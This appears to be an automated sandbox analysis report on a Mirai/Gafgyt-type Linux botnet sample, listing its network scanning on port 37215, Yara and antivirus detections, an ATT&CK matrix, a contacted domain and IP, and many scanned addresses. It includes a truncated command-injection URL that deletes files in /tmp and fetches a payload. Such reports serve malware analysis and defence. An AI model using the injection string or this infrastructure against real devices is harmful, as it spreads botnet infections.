              Source: unknownNetwork traffic detected: HTTP traffic on port 54080 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36160 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40920 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44912 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58696 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38772 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58124 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58496 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59058 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54092 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51478 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60068 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47684 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40262 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45842 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60892 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47420 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34658 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49364 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49574 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39256 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34116 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53256 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57288 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34126 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44494 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46300 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34526 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53642 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42860 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55908 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38666 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60760 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33794 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42688 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45602 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37114 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43740 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41000 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60104 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58116 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57732 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53226 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54010 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55978 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44092 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48334 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57668 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42426 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46470 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35684 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45138 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41992 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42000 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37822 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60606 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57692 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59268 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52352 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59374 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34410 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38672 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35928 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56490 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39182 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43862 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37250 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43420 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52304 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42834 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60588 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45096 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44642 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55144 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34470 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37740 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47668 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36728 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39772 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41204 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53540 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53796 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54864 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41042 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53054 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60002 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33730 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42754 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34924 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43726 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40892 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59194 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46258 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34742 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36192 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59834 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37724 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44436 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50380 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46756 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34652 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48620 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47800 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58850 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41680 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37048 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51982 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35724 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49158 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60150 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54276 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60622 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41184 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38878 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40474 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41044 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52408 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46636 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57742 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54184 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38026 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41492 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39248 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46284 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57036 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36302 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48752 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45824 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35150 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60204 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59848 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56528 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52032 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39772 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39772 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39772 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39772 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39772 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39772 -> 37215
              Source: /tmp/t9lNEiD3ui.elf (PID: 6203)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6221)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6222)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6224)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6225)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd (PID: 6253)Queries kernel information via 'uname': Jump to behavior
              Source: t9lNEiD3ui.elf, 6203.1.00007ffcce9a7000.00007ffcce9c8000.rw-.sdmp, t9lNEiD3ui.elf, 6207.1.00007ffcce9a7000.00007ffcce9c8000.rw-.sdmp, t9lNEiD3ui.elf, 6208.1.00007ffcce9a7000.00007ffcce9c8000.rw-.sdmp, t9lNEiD3ui.elf, 6209.1.00007ffcce9a7000.00007ffcce9c8000.rw-.sdmp, t9lNEiD3ui.elf, 6212.1.00007ffcce9a7000.00007ffcce9c8000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
              Source: t9lNEiD3ui.elf, 6203.1.00007ffcce9a7000.00007ffcce9c8000.rw-.sdmp, t9lNEiD3ui.elf, 6207.1.00007ffcce9a7000.00007ffcce9c8000.rw-.sdmp, t9lNEiD3ui.elf, 6208.1.00007ffcce9a7000.00007ffcce9c8000.rw-.sdmp, t9lNEiD3ui.elf, 6209.1.00007ffcce9a7000.00007ffcce9c8000.rw-.sdmp, t9lNEiD3ui.elf, 6212.1.00007ffcce9a7000.00007ffcce9c8000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/t9lNEiD3ui.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/t9lNEiD3ui.elf
              Source: t9lNEiD3ui.elf, 6203.1.000055d7d2eb4000.000055d7d2f17000.rw-.sdmp, t9lNEiD3ui.elf, 6207.1.000055d7d2eb4000.000055d7d2f17000.rw-.sdmp, t9lNEiD3ui.elf, 6208.1.000055d7d2eb4000.000055d7d2f17000.rw-.sdmp, t9lNEiD3ui.elf, 6209.1.000055d7d2eb4000.000055d7d2f17000.rw-.sdmp, t9lNEiD3ui.elf, 6212.1.000055d7d2eb4000.000055d7d2f17000.rw-.sdmpBinary or memory string: U5!/etc/qemu-binfmt/sh4
              Source: t9lNEiD3ui.elf, 6203.1.000055d7d2eb4000.000055d7d2f17000.rw-.sdmp, t9lNEiD3ui.elf, 6207.1.000055d7d2eb4000.000055d7d2f17000.rw-.sdmp, t9lNEiD3ui.elf, 6208.1.000055d7d2eb4000.000055d7d2f17000.rw-.sdmp, t9lNEiD3ui.elf, 6209.1.000055d7d2eb4000.000055d7d2f17000.rw-.sdmp, t9lNEiD3ui.elf, 6212.1.000055d7d2eb4000.000055d7d2f17000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: t9lNEiD3ui.elf, type: SAMPLE
              Source: Yara matchFile source: 6203.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6212.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6207.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6209.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6208.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: t9lNEiD3ui.elf PID: 6203, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: t9lNEiD3ui.elf PID: 6207, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: t9lNEiD3ui.elf PID: 6208, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: t9lNEiD3ui.elf PID: 6209, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: t9lNEiD3ui.elf PID: 6212, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: t9lNEiD3ui.elf, type: SAMPLE
              Source: Yara matchFile source: 6203.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6212.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6207.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6209.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6208.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: t9lNEiD3ui.elf PID: 6203, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: t9lNEiD3ui.elf PID: 6207, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: t9lNEiD3ui.elf PID: 6208, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: t9lNEiD3ui.elf PID: 6209, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: t9lNEiD3ui.elf PID: 6212, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid AccountsWindows Management Instrumentation1
              Scripting
              Path Interception1
              Hidden Files and Directories
              1
              OS Credential Dumping
              11
              Security Software Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network Medium1
              Service Stop
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
              Ingress Tool Transfer
              Scheduled TransferData Encrypted for Impact
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1450304 Sample: t9lNEiD3ui.elf Startdate: 01/06/2024 Architecture: LINUX Score: 100 29 197.241.174.222, 37215, 60650 movicel-asAO Angola 2->29 31 197.187.237.33, 37215, 60650 airtel-tz-asTZ Tanzania United Republic of 2->31 33 99 other IPs or domains 2->33 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus / Scanner detection for submitted sample 2->39 41 4 other signatures 2->41 8 t9lNEiD3ui.elf 2->8         started        10 xfce4-panel wrapper-2.0 2->10         started        12 xfce4-panel wrapper-2.0 2->12         started        14 6 other processes 2->14 signatures3 process4 process5 16 t9lNEiD3ui.elf 8->16         started        18 wrapper-2.0 xfpm-power-backlight-helper 10->18         started        process6 20 t9lNEiD3ui.elf 16->20         started        23 t9lNEiD3ui.elf 16->23         started        25 t9lNEiD3ui.elf 16->25         started        27 2 other processes 16->27 signatures7 43 Sample tries to kill multiple processes (SIGKILL) 20->43

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              t9lNEiD3ui.elf66%ReversingLabsLinux.Trojan.Mirai
              t9lNEiD3ui.elf62%VirustotalBrowse
              t9lNEiD3ui.elf100%AviraEXP/ELF.Gafgyt.T
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
              http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              woofwoof.cfd
              94.156.64.221
              truefalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+trueunknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.xmlsoap.org/soap/encoding/t9lNEiD3ui.elffalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/soap/envelope/t9lNEiD3ui.elffalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                1.73.209.108
                unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                41.193.123.12
                unknownSouth Africa
                11845Vox-TelecomZAfalse
                156.198.87.202
                unknownEgypt
                8452TE-ASTE-ASEGtrue
                156.190.226.143
                unknownEgypt
                36992ETISALAT-MISREGfalse
                121.254.110.244
                unknownTaiwan; Republic of China (ROC)
                17809VEETIME-TW-APVEETIMECORPTWfalse
                172.95.33.140
                unknownUnited States
                5650FRONTIER-FRTRUSfalse
                202.28.233.55
                unknownThailand
                4762MAHIDOL-BORDER-ASMahidolUniversityThailandTHfalse
                79.245.62.59
                unknownGermany
                3320DTAGInternetserviceprovideroperationsDEfalse
                101.12.204.99
                unknownTaiwan; Republic of China (ROC)
                24158TAIWANMOBILE-ASTaiwanMobileCoLtdTWfalse
                62.160.205.76
                unknownFrance
                3215FranceTelecom-OrangeFRfalse
                156.60.223.213
                unknownUnited States
                1226CTA-42-AS1226USfalse
                212.172.132.159
                unknownGermany
                12312ECOTELDEfalse
                110.154.211.233
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                126.210.55.25
                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                142.48.228.191
                unknownCanada
                3633PROVINCE-OF-BRITISH-COLUMBIACAfalse
                156.32.17.217
                unknownUnited States
                29975VODACOM-ZAfalse
                113.2.173.216
                unknownChina
                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                197.142.130.140
                unknownAlgeria
                36891ICOSNET-ASDZfalse
                109.244.96.111
                unknownChina
                45090CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompafalse
                212.34.153.120
                unknownSpain
                20648RAN-NETWORKSEStrue
                207.147.78.144
                unknownUnited States
                2711SPIRITTEL-ASUSfalse
                124.126.158.225
                unknownChina
                4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                104.5.157.201
                unknownUnited States
                7018ATT-INTERNET4USfalse
                156.84.166.207
                unknownUnited States
                10695WAL-MARTUSfalse
                197.188.167.216
                unknownNamibia
                36996TELECOM-NAMIBIANAfalse
                198.148.115.164
                unknownUnited States
                35916MULTA-ASN1USfalse
                41.20.19.240
                unknownSouth Africa
                36994Vodacom-VBZAfalse
                199.132.136.121
                unknownUnited States
                4152USDA-1USfalse
                42.2.238.124
                unknownHong Kong
                4760HKTIMS-APHKTLimitedHKfalse
                59.51.24.146
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                57.107.254.70
                unknownBelgium
                51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
                96.155.51.21
                unknownUnited States
                7922COMCAST-7922USfalse
                197.159.86.205
                unknownunknown
                37018GALAXYBB-ASNGfalse
                187.114.167.144
                unknownBrazil
                18881TELEFONICABRASILSABRfalse
                24.129.100.53
                unknownUnited States
                7922COMCAST-7922USfalse
                42.21.30.53
                unknownKorea Republic of
                9644SKTELECOM-NET-ASSKTelecomKRfalse
                23.124.19.195
                unknownUnited States
                7018ATT-INTERNET4USfalse
                41.184.66.131
                unknownNigeria
                29091IPNXngNGfalse
                176.217.147.111
                unknownTurkey
                8386KOCNETTRfalse
                134.228.180.107
                unknownUnited States
                13490BUCKEYECABLEVISIONUSfalse
                150.122.8.138
                unknownChina
                4152USDA-1USfalse
                50.193.59.167
                unknownUnited States
                7922COMCAST-7922USfalse
                162.204.206.26
                unknownUnited States
                7018ATT-INTERNET4USfalse
                58.188.196.185
                unknownJapan17511OPTAGEOPTAGEIncJPfalse
                19.139.78.198
                unknownUnited States
                3MIT-GATEWAYSUSfalse
                197.245.254.160
                unknownSouth Africa
                11845Vox-TelecomZAfalse
                94.179.128.98
                unknownUkraine
                6849UKRTELNETUAfalse
                44.225.253.229
                unknownUnited States
                16509AMAZON-02USfalse
                83.218.78.62
                unknownSweden
                29468INFRACOMSEfalse
                45.244.146.82
                unknownEgypt
                24863LINKdotNET-ASEGfalse
                156.92.126.60
                unknownUnited States
                10695WAL-MARTUSfalse
                41.95.200.242
                unknownSudan
                36998SDN-MOBITELSDfalse
                124.177.120.3
                unknownAustralia
                1221ASN-TELSTRATelstraCorporationLtdAUfalse
                115.79.30.121
                unknownViet Nam
                7552VIETEL-AS-APViettelGroupVNfalse
                197.187.83.231
                unknownTanzania United Republic of
                37133airtel-tz-asTZfalse
                60.39.84.21
                unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                156.183.225.236
                unknownEgypt
                36992ETISALAT-MISREGfalse
                209.188.254.145
                unknownUnited States
                2152CSUNET-NWUSfalse
                86.59.156.56
                unknownHungary
                5483MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHUfalse
                148.119.134.81
                unknownNorway
                2119TELENOR-NEXTELTelenorNorgeASNOfalse
                78.127.63.151
                unknownFrance
                8228CEGETEL-ASFRfalse
                156.113.109.247
                unknownUnited States
                393504XNSTGCAtrue
                205.249.54.111
                unknownUnited States
                3364CSDCO-ASUStrue
                41.99.255.20
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                197.142.186.152
                unknownAlgeria
                36891ICOSNET-ASDZfalse
                36.41.243.140
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                148.141.25.186
                unknownUnited States
                18844SHERWIN-ASUSfalse
                169.133.55.117
                unknownUnited States
                209CENTURYLINK-US-LEGACY-QWESTUSfalse
                72.9.39.36
                unknownUnited States
                14131DATAYARDUSfalse
                149.170.189.6
                unknownUnited Kingdom
                786JANETJiscServicesLimitedGBfalse
                41.74.34.25
                unknownChad
                37292OTI-ASBJtrue
                143.132.39.47
                unknownUnited States
                32229JSUMS-ARINUSfalse
                141.181.17.17
                unknownUnited States
                197921HBTFJOfalse
                196.108.34.85
                unknownKenya
                33771SAFARICOM-LIMITEDKEfalse
                156.118.202.33
                unknownFrance
                59863NORSKREGNESENTRALNOtrue
                41.95.142.163
                unknownSudan
                36998SDN-MOBITELSDfalse
                53.27.29.37
                unknownGermany
                31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                198.203.182.175
                unknownUnited States
                10879UHCUStrue
                197.241.174.222
                unknownAngola
                37081movicel-asAOtrue
                135.192.200.24
                unknownUnited States
                14962NCR-252USfalse
                41.123.244.75
                unknownSouth Africa
                16637MTNNS-ASZAfalse
                112.189.236.44
                unknownKorea Republic of
                4766KIXS-AS-KRKoreaTelecomKRfalse
                41.1.8.235
                unknownSouth Africa
                29975VODACOM-ZAfalse
                5.101.235.186
                unknownRussian Federation
                15552DIGCOMMRUfalse
                41.191.51.126
                unknownunknown
                36974AFNET-ASCIfalse
                19.162.241.239
                unknownUnited States
                3MIT-GATEWAYSUSfalse
                46.119.70.215
                unknownUkraine
                15895KSNET-ASUAfalse
                126.15.23.25
                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                170.178.21.72
                unknownUnited States
                11685HNBCOL-ASUSfalse
                197.187.237.33
                unknownTanzania United Republic of
                37133airtel-tz-asTZtrue
                25.236.239.227
                unknownUnited Kingdom
                7922COMCAST-7922USfalse
                197.115.116.46
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                85.180.164.31
                unknownGermany
                6805TDDE-ASN1DEfalse
                156.241.96.20
                unknownSeychelles
                133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                206.26.7.6
                unknownUnited States
                3561CENTURYLINK-LEGACY-SAVVISUSfalse
                172.148.19.182
                unknownUnited States
                7018ATT-INTERNET4USfalse
                126.83.226.0
                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                41.139.184.97
                unknownKenya
                37061SafaricomKEtrue
                41.223.56.124
                unknownKenya
                36926CKL1-ASNKEfalse
                121.249.225.29
                unknownChina
                138371CNGI-QDA-IX-AS-APCERNET2regionalIXatOceanUniversityoffalse
